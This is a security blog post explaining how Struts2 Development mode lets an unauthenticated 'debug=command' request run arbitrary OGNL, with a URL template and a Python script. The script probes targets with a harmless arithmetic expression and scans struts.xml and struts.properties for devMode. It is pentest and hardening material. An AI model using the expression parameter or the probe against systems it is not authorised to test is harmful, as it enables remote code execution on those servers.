
Struts2 DevMode RCE with Metasploit module

Struts2 is a very powerful and popular Java web framework. It is widespread, used in many enterprise applications, large and less large. This summer, a critical vulnerability was found in Struts2: an OGNL injection that leads to remote code execution (RCE). It is simple, requires no authentication, and works against almost all versions (except the latest one).

When the advisory was published, there were a lot of attacks against unpatched systems on the Internet.

That was incredible.

But this vulnerability was not the first one. Several very similar OGNL injections have been found within the last three years. Only one of them attracted my attention when I dove deeper into this area, because it is not a bug but a feature. Therefore, it will not be fixed.

I’m talking about the Development mode.

Development mode is a special feature that provides some convenient ways to debug applications. You can switch it on for any of your applications simply by setting the constant “struts.devMode” to “true” in struts.xml (<constant name="struts.devMode" value="true" />).

When it is enabled, you can add the “debug” parameter to the URL of any action. The parameter takes one of these useful values:

  1. xml – dumps a lot of information about the action and its environment (a good information disclosure on its own)
  2. console – opens a new window in which we can enter any OGNL expression (a web debugger)

Yes, yes! We can evaluate an arbitrary OGNL expression and get RCE on any app where DevMode is on.

The “console” doesn’t always work as expected. But when we type a command in the console, all it does is send the OGNL expression in the “expression” parameter together with “debug=command”, so we can send that request ourselves. Something like this:

http://127.0.0.1:8080/struts2-mailreader/Registration_input.do?debug=command&expression=ognl_expression
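As an added example (not the original post's Metasploit module and not Struts code), the script below builds the three debug requests described above, sends an arithmetic OGNL probe in the “expression” parameter and decides from the response whether the server evaluated it, and, on the defensive side, flags struts.devMode=true in a struts.xml or struts.properties. The target URL, the SAMPLE_STRUTS_XML and the fake responses in the usage are constructed; the “product appears in the body” check is a heuristic, and the default fetcher assumes plain HTTP reachability.

```python
"""Struts2 DevMode debug-parameter helpers (added example, not ERPScan's module)."""
import re
import urllib.request
import xml.etree.ElementTree as ET
from typing import Callable, Optional
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

DEBUG_MODES = ("xml", "console", "command")

# Arithmetic probe: DevMode evaluates the OGNL and prints the product, a number
# that is unlikely to appear on the page by accident. No command is executed.
PROBE_A, PROBE_B = 7, 191


def build_debug_url(action_url: str, mode: str, expression: Optional[str] = None) -> str:
    """Append the DevMode debug parameters to an action URL.

    debug=xml and debug=console take nothing else; debug=command carries the OGNL
    expression in the 'expression' parameter, exactly as the console does.
    Existing query parameters are kept, and the OGNL is URL-encoded (it is full of
    '#', '@', '*', '[' and quotes that must not reach the query string raw).
    """
    if mode not in DEBUG_MODES:
        raise ValueError(f"mode must be one of {DEBUG_MODES}")
    parts = urlsplit(action_url)
    query = parse_qsl(parts.query, keep_blank_values=True)
    query.append(("debug", mode))
    if mode == "command":
        if expression is None:
            raise ValueError("debug=command requires an OGNL expression")
        query.append(("expression", expression))
    return urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(query), parts.fragment))


def probe_expression() -> str:
    return f"{PROBE_A}*{PROBE_B}"  # "7*191"


def probe_marker() -> str:
    return str(PROBE_A * PROBE_B)  # "1337"


def ognl_was_evaluated(body: str) -> bool:
    """Heuristic: the product is in the body while the raw expression is not echoed."""
    return probe_marker() in body and probe_expression() not in body


def _default_fetch(url: str) -> str:
    # Assumption: target reachable over plain HTTP; swap in your own session/proxy.
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def devmode_command_probe(action_url: str, fetch: Callable[[str], str] = _default_fetch) -> bool:
    """Send debug=command with the arithmetic probe; True if DevMode evaluated it."""
    return ognl_was_evaluated(fetch(build_debug_url(action_url, "command", probe_expression())))


def devmode_in_struts_xml(xml_text: str) -> bool:
    """True if struts.xml contains <constant name="struts.devMode" value="true"/>."""
    root = ET.fromstring(xml_text)
    for const in root.iter("constant"):
        if const.get("name") == "struts.devMode" and (const.get("value") or "").strip().lower() == "true":
            return True
    return False


_PROP_RE = re.compile(r"^\s*struts\.devMode\s*[=:]\s*(\S+)")


def devmode_in_struts_properties(props_text: str) -> bool:
    """True if struts.properties sets struts.devMode=true (the other place it can be set)."""
    return any(
        (m := _PROP_RE.match(line)) and m.group(1).lower() == "true"
        for line in props_text.splitlines()
    )


# Constructed sample config, not taken from any real deployment.
SAMPLE_STRUTS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
    "http://struts.apache.org/dtds/struts-2.3.dtd">
<struts>
    <constant name="struts.devMode" value="true" />
    <package name="default" extends="struts-default" />
</struts>
"""

if __name__ == "__main__":
    target = "http://127.0.0.1:8080/struts2-mailreader/Registration_input.do"
    for mode in ("xml", "console"):
        print(build_debug_url(target, mode))
    print(build_debug_url(target, "command", probe_expression()))
    # Offline demonstration with a fake server that behaves like DevMode.
    fake = lambda url: "1337\n" if "expression=7%2A191" in url else "<html/>"
    print("DevMode evaluates OGNL:", devmode_command_probe(target, fetch=fake))
    print("devMode in sample struts.xml:", devmode_in_struts_xml(SAMPLE_STRUTS_XML))
```

The probe deliberately stops at arithmetic: once `devmode_command_probe` returns True, the “expression” parameter accepts whatever OGNL the operator chooses to send, which is the step the Metasploit module automates. The two config checks are what you would run over a build before it ships, since the documentation's “switch it off in production” advice is only as good as the last person who edited struts.xml.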

It is also worth mentioning that DevMode is switched off by default, and the official documentation says it must be switched off when you move an app from development to production.

But in practice, we have seen such cases during our pentests. In addition, the Struts2 example applications ship with DevMode on by default.

So, if you conduct a pentest against Struts2 apps, this can be a very useful attack vector.

By the way, this attack may already be well known to some people. But the main goal of this post is to explain the idea of the attack and present a module for the Metasploit Framework.

I thank Renaud Dubourguais, from whose article I learned about the attack.

Alexey Tyurin (@antyurin)